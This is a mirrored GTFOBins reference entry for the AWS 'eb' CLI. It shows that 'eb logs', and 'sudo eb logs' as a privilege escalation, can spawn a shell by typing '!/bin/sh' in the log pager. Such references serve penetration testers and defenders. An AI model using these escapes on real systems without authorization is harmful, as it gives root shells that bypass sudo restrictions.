mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
13 lines
352 B
Markdown
13 lines
352 B
Markdown
|
---
|
||
|
description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
eb logs
|
||
|
!/bin/sh
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo eb logs
|
||
|
!/bin/sh
|
||
|
---
|